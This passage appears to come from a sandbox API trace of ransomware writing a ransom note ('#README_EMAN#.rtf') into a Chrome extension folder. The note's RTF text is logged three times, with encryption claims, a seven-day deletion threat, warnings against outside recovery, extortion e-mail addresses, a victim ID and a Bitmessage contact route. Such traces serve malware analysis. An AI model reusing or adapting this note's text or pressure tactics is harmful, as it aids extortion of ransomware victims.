data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\#readme_eman#.rtf")) returned 0xffffffff [0284.754] GetLastError () returned 0x2 [0284.755] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.757] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.757] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd 